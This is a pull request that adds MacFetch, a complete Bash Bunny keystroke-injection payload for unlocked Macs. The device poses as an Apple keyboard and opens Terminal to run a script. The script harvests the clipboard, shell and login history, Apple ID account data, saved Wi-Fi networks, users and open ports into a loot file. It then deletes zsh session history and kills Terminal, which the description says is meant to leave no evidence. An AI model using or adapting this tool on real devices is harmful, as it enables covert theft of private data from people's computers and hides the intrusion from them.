### PR TITLE
Add MacFetch

### DIFF
--- a/payloads/library/recon/MacFetch/README.md
+++ b/payloads/library/recon/MacFetch/README.md
@@ -32,4 +32,5 @@ Get a bunch of delicious data from unlocked macOS devices.
 | Magenta solid (SETUP) | Set ATTACKMODE and get SWITCH_POSITION |
 | Yellow single blink (ATTACK) | Ongoing information collection |
 | White fast blink (CLEANUP) | Erase the footprint and clean up |
+
 *Average runtime: 25 seconds*

--- a/payloads/library/recon/MacFetch/README.md
+++ b/payloads/library/recon/MacFetch/README.md
@@ -1,0 +1,35 @@
+# MacFetch
+* Author: 90N45
+* Version: 1.0
+* Target: Mac
+* Attackmodes: HID, STORAGE
+
+### Description
+Get a bunch of delicious data from unlocked macOS devices.
+
+### Saving the following Data:
+- Current User
+- All Users
+- Hostname
+- WiFi Interface
+- Current WiFi Connection State
+- Preferred WiFi Networks (Perfect for WiFi Pineapple’s SSID pool)
+- Known Bluetooth Devices
+- Clipboard
+- Public IP
+- Open Network Ports
+- Applications
+- Applications Starting at System Boot/Login
+- Software and Hardware Information
+- Terminal History
+- Login History
+- Apple ID Information
+- Ifconfig output
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Set ATTACKMODE and get SWITCH_POSITION |
+| Yellow single blink (ATTACK) | Ongoing information collection |
+| White fast blink (CLEANUP) | Erase the footprint and clean up |
+*Average runtime: 25 seconds*

--- a/payloads/library/recon/MacFetch/README.md
+++ b/payloads/library/recon/MacFetch/README.md
@@ -32,5 +32,6 @@ Get a bunch of delicious data from unlocked macOS devices.
 | Magenta solid (SETUP) | Set ATTACKMODE and get SWITCH_POSITION |
 | Yellow single blink (ATTACK) | Ongoing information collection |
 | White fast blink (CLEANUP) | Erase the footprint and clean up |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished |
 
 *Average runtime: 25 seconds*

--- a/payloads/library/recon/MacFetch/fetch.sh
+++ b/payloads/library/recon/MacFetch/fetch.sh
@@ -1,0 +1,115 @@
+#! /bin/bash
+
+# Read useful data
+clear
+echo "[                    ] 0%"
+date=$(date "+%Y-%m-%d-%H-%M")
+clear
+echo "[#                   ] 5%"
+user=$(whoami)
+clear
+echo "[##                  ] 10%"
+users=$(dscacheutil -q user | grep -A 3 -B 2 -e uid:\ 5'[0-9][0-9]')
+clear
+echo "[###                 ] 15%"
+host=$(hostname)
+clear
+echo "[####                ] 20%"
+wifi_interface=$(networksetup -listallhardwareports | grep Wi-Fi -A 1 | tail -1 | sed 's/.* //')
+clear
+echo "[#####               ] 25%"
+current_wifi=$(airport --getinfo)
+clear
+echo "[######              ] 30%"
+preffered_wifi=$(networksetup -listpreferredwirelessnetworks ${wifi_interface})
+clear
+echo "[#######             ] 35%"
+bt_devices=$(system_profiler SPBluetoothDataType)
+clear
+echo "[########            ] 40%"
+clipboard=$(osascript -e 'the clipboard')
+clear
+echo "[#########           ] 45%"
+public_ip=$(curl ipinfo.io/ip)
+clear
+echo "[###########         ] 55%"
+ports=$(lsof -Pn -i4 | grep LISTEN)
+clear
+echo "[###########         ] 60%"
+apps=$(ls /Applications)
+clear
+echo "[############        ] 65%"
+login_apps=$(osascript -e 'tell application "System Events" to get the name of every login item')
+clear
+echo "[############        ] 70%"
+term_history=$(cat -n ~/.zsh_history | tail -15)
+clear
+echo "[############        ] 75%"
+login=$(last | head -60)
+clear
+echo "[#############       ] 80%"
+appleid=$(defaults read MobileMeAccounts Accounts)
+clear
+echo "[##############      ] 85%"
+ware_info=$(system_profiler SPSoftwareDataType SPHardwareDataType)
+clear
+echo "[###############     ] 90%"
+ifaceconf=$(ifconfig)
+clear
+echo "[################    ] 95%"
+
+# Write useful data
+cat << EOF > /Volumes/BashBunny/loot/MacFetch-${date}.log
+--- CURRENT USER ---
+${user}
+
+--- ALL USERS ---
+${users}
+
+--- HOST ---
+${host}
+
+--- WIFI INTERFACE ---
+${wifi_interface}
+
+--- CURRENT WIFI ---
+${current_wifi}
+
+--- PREFERRED WIFI NETWORKS ---
+${preffered_wifi}
+
+--- KNOWN BLUETOOTH DEVICES ---
+${bt_devices}
+
+--- CLIPBOARD ---
+${clipboard}
+
+--- PUBLIC IP ---
+${public_ip}
+
+--- OPEN NETWORK PORTS ---
+${ports}
+
+--- APPLICATIONS ---
+${apps}
+
+--- APPLICATIONS STARTING AT SYSTEM START ---
+${login_apps}
+
+--- SOFT-, HARDWARE INFO ---
+${ware_info}
+
+--- TERMINAL HISTORY ---
+${term_history}
+
+--- LOGIN HISTORY ---
+${login}
+
+--- APPLE ID INFO ---
+${appleid}
+
+--- IFCONFIG ---
+${ifaceconf}
+EOF
+clear
+echo "[####################] 100%"

--- a/payloads/library/recon/MacFetch/payload.txt
+++ b/payloads/library/recon/MacFetch/payload.txt
@@ -1,0 +1,63 @@
+#!/bin/bash
+#
+# Title:         MacFetch
+# Description:   Get a bunch of delicious data from unlocked macOS devices.
+# Author:        90N45
+# Version:       1.0
+# Category:      Recon
+# Attackmodes:   HID, STORAGE
+#
+# Saving the following Data:
+# - Current User
+# - All Users
+# - Hostname
+# - WiFi Interface
+# - Current WiFi Connection State
+# - Preferred WiFi Networks
+# - Known Bluetooth Devices
+# - Clipboard
+# - Public IP
+# - Open Network Ports
+# - Applications
+# - Applications Starting at System Boot/Login
+# - Software and Hardware Information
+# - Terminal History
+# - Login History
+# - Apple ID Information
+# - Ifconfig output
+
+LED SETUP
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+GET SWITCH_POSITION
+
+LED ATTACK
+# Open terminal
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 1500
+
+# Run fetch.sh script from BB (faster than writing all commands via HID)
+QUACK STRING "chmod +x /Volumes/BashBunny/payloads/${SWITCH_POSITION}/fetch.sh && bash /Volumes/BashBunny/payloads/${SWITCH_POSITION}/fetch.sh"
+QUACK ENTER
+
+QUACK DELAY 3000
+
+LED CLEANUP
+# Delete bash variables
+QUACK STRING unset date user users host wifi_interface current_wifi preffered_wifi bt_devices clipboard public_ip ports apps login_apps ware_info term_history login appleid ifaceconf
+QUACK ENTER 
+# Eject BB storage
+QUACK STRING diskutil eject /Volumes/BashBunny/
+QUACK ENTER
+# Remove terminal history from current session (commands used in attack won't be visible with the history command)
+QUACK STRING "rm -r ~/.zsh_sessions"
+QUACK ENTER
+# Exit terminal
+QUACK STRING killall Terminal
+QUACK ENTER
+
+sync
+
+LED FINISH


### PR DESCRIPTION
### This payload fetches the following information from a Macintosh:
- Current User
- All Users
- Hostname
- WiFi Interface
- Current WiFi Connection State
- Preferred WiFi Networks (Perfect for WiFi Pineapple’s SSID pool)
- Known Bluetooth Devices
- Clipboard
- Public IP
- Open Network Ports
- Applications
- Applications Starting at System Boot/Login
- Software and Hardware Information
- Terminal History
- Login History
- Apple ID Information
- Ifconfig output

#### ...and saves it as `MacFetch-T-I-M-E-S-T-A-M-P.log` in BB's loot directory. All in about 25 seconds, also cleaning up the bash history (well ZSH actually) so as not to leave any evidence of being pwned.